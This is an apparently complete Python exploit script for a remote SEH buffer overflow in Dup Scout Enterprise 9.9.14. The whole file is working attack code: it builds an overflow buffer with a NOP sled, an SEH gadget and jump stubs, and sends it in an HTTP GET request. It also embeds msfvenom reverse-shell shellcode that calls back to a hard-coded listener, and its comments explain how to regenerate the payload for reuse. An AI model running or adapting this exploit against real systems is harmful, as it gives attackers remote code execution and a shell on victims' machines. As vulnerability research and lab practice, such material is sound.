Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)
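#!/usr/bin/env python3
# Dup Scout Enterprise v9.9.14 SEH Overflow
# This is my PoC for the previously discovered Dup Scout Enterprise SEH
# overflow vuln.
#
# The original exploit can be viewed here: https://www.exploit-db.com/exploits/42557
#
# Usage: python3 exploit.py <IP_ADDRESS>
#
# Caveats before re-using this:
#   * `shellcode` is a msfvenom reverse shell that connects back to the
#     LHOST/LPORT baked in when it was generated (command below). Regenerate
#     it for your own listener with the same bad-character list;
#     build_payload() refuses a payload that reintroduces a bad character
#     or no longer fits in front of nSEH.
#   * The pop/pop/ret address is taken from libspp.dll as shipped with
#     9.9.14. Any other build needs a fresh gadget.
import socket
import sys
from struct import pack

PORT = 8080  # Dup Scout Enterprise web interface
SIZE = 5000  # total bytes placed in the URI; enough to overwrite the SEH record
TIMEOUT = 10.0  # seconds; without it an unreachable host blocks forever

# Offsets inside the buffer, as found during the original crash analysis.
SEH_OFFSET = 2496  # exception handler pointer is overwritten here
NSEH_OFFSET = SEH_OFFSET - 4  # the "next SEH" pointer sits just before it

# Bytes that must never appear in the buffer. NUL plus the HTTP request-line
# delimiters (tab, LF, CR, space) -- presumably because they would terminate
# or split the URI before the vulnerable copy happens.
BAD_CHARS = b"\x00\x09\x0a\x0d\x20"

# libspp.dll: pop r32; pop r32; ret. Build-specific -- see header caveats.
SEH_GADGET = 0x101516D0

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.190.137
# LPORT=4444 -b "\x00\x09\x0a\x0d\x20" -f python -v shellcode
shellcode = b""
shellcode += b"\xbe\xde\xde\xed\x74\xdb\xcd\xd9\x74\x24\xf4"
shellcode += b"\x58\x33\xc9\xb1\x52\x83\xc0\x04\x31\x70\x0e"
shellcode += b"\x03\xae\xd0\x0f\x81\xb2\x05\x4d\x6a\x4a\xd6"
shellcode += b"\x32\xe2\xaf\xe7\x72\x90\xa4\x58\x43\xd2\xe8"
shellcode += b"\x54\x28\xb6\x18\xee\x5c\x1f\x2f\x47\xea\x79"
shellcode += b"\x1e\x58\x47\xb9\x01\xda\x9a\xee\xe1\xe3\x54"
shellcode += b"\xe3\xe0\x24\x88\x0e\xb0\xfd\xc6\xbd\x24\x89"
shellcode += b"\x93\x7d\xcf\xc1\x32\x06\x2c\x91\x35\x27\xe3"
shellcode += b"\xa9\x6f\xe7\x02\x7d\x04\xae\x1c\x62\x21\x78"
shellcode += b"\x97\x50\xdd\x7b\x71\xa9\x1e\xd7\xbc\x05\xed"
shellcode += b"\x29\xf9\xa2\x0e\x5c\xf3\xd0\xb3\x67\xc0\xab"
shellcode += b"\x6f\xed\xd2\x0c\xfb\x55\x3e\xac\x28\x03\xb5"
shellcode += b"\xa2\x85\x47\x91\xa6\x18\x8b\xaa\xd3\x91\x2a"
shellcode += b"\x7c\x52\xe1\x08\x58\x3e\xb1\x31\xf9\x9a\x14"
shellcode += b"\x4d\x19\x45\xc8\xeb\x52\x68\x1d\x86\x39\xe5"
shellcode += b"\xd2\xab\xc1\xf5\x7c\xbb\xb2\xc7\x23\x17\x5c"
shellcode += b"\x64\xab\xb1\x9b\x8b\x86\x06\x33\x72\x29\x77"
shellcode += b"\x1a\xb1\x7d\x27\x34\x10\xfe\xac\xc4\x9d\x2b"
shellcode += b"\x62\x94\x31\x84\xc3\x44\xf2\x74\xac\x8e\xfd"
shellcode += b"\xab\xcc\xb1\xd7\xc3\x67\x48\xb0\x2b\xdf\xec"
shellcode += b"\xc9\xc4\x22\x10\xdb\x48\xaa\xf6\xb1\x60\xfa"
shellcode += b"\xa1\x2d\x18\xa7\x39\xcf\xe5\x7d\x44\xcf\x6e"
shellcode += b"\x72\xb9\x9e\x86\xff\xa9\x77\x67\x4a\x93\xde"
shellcode += b"\x78\x60\xbb\xbd\xeb\xef\x3b\xcb\x17\xb8\x6c"
shellcode += b"\x9c\xe6\xb1\xf8\x30\x50\x68\x1e\xc9\x04\x53"
shellcode += b"\x9a\x16\xf5\x5a\x23\xda\x41\x79\x33\x22\x49"
shellcode += b"\xc5\x67\xfa\x1c\x93\xd1\xbc\xf6\x55\x8b\x16"
shellcode += b"\xa4\x3f\x5b\xee\x86\xff\x1d\xef\xc2\x89\xc1"
shellcode += b"\x5e\xbb\xcf\xfe\x6f\x2b\xd8\x87\x8d\xcb\x27"
shellcode += b"\x52\x16\xfb\x6d\xfe\x3f\x94\x2b\x6b\x02\xf9"
shellcode += b"\xcb\x46\x41\x04\x48\x62\x3a\xf3\x50\x07\x3f"
shellcode += b"\xbf\xd6\xf4\x4d\xd0\xb2\xfa\xe2\xd1\x96"


def build_payload(size: int = SIZE) -> bytes:
    """Assemble the overflow buffer that is sent as the request URI.

    Layout (byte offsets):
        0            20-byte NOP sled
        20           shellcode
        ...          'A' filler up to nSEH
        2492 (nSEH)  short jmp +6, hops over the SEH pointer
        2496 (SEH)   pop/pop/ret gadget, which returns into nSEH
        2500         near jmp backwards into the NOP sled
        2505..size   'D' filler so the request is long enough to crash

    The sled and shellcode sit at the *start* of the buffer because there is
    not enough stack after the SEH record to hold them.

    Args:
        size: total buffer length; must be at least the 2505-byte stub.

    Returns:
        The raw buffer, exactly `size` bytes long.

    Raises:
        ValueError: if sled + shellcode no longer fit before nSEH, if `size`
            is smaller than the stub, or if the buffer contains one of
            BAD_CHARS (typically after regenerating `shellcode`).
    """
    buf = b"\x90" * 20 + shellcode
    if len(buf) > NSEH_OFFSET:
        raise ValueError(
            "sled + shellcode is %d bytes but only %d fit before nSEH"
            % (len(buf), NSEH_OFFSET)
        )
    buf += b"A" * (NSEH_OFFSET - len(buf))
    buf += b"\xEB\x06\x90\x90"  # nSEH: jmp short +6 -> lands at offset 2500
    buf += pack("<I", SEH_GADGET)  # SEH: pop r32; pop r32; ret -> executes nSEH
    # jmp rel32, displacement -0x40c9 from the next instruction, i.e. 0x40c4
    # bytes back from the jmp itself. NOTE(review): that is far more than the
    # 2500 bytes back to the start of this buffer, so it presumably lands in
    # another copy of the request on the stack -- confirm in a debugger
    # before touching SIZE or the sled.
    buf += b"\xE9\x37\xBF\xFF\xFF"
    if size < len(buf):
        raise ValueError(
            "size %d is smaller than the %d-byte exploit stub" % (size, len(buf))
        )
    buf += b"D" * (size - len(buf))

    present = set(buf) & set(BAD_CHARS)
    if present:
        raise ValueError(
            "payload contains bad characters: %s"
            % ", ".join("0x%02x" % b for b in sorted(present))
        )
    return buf


def main(argv: "list[str]") -> int:
    """Send the malformed GET request to <IP_ADDRESS>:PORT.

    Returns the process exit status: 1 on a usage error, 0 after the packet
    has been sent. Socket errors and timeouts propagate to the caller.
    """
    if len(argv) != 2:
        print("Usage: python3 exploit.py <IP_ADDRESS>")
        return 1
    ip = argv[1]

    buf = build_payload()
    # The buffer travels in the request URI; the "/../" prefix is part of
    # the original trigger.
    packet = b"GET /../%s HTTP/1.1\r\n" % buf
    packet += b"\r\n"

    print("Sending packet of %d bytes (%d-byte buffer)" % (len(packet), len(buf)))
    # The context manager closes the socket even if the send raises, and
    # sendall() keeps writing until the whole packet is out, unlike send(),
    # which may return after a partial write and leave the request truncated.
    with socket.create_connection((ip, PORT), timeout=TIMEOUT) as s:
        s.sendall(packet)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))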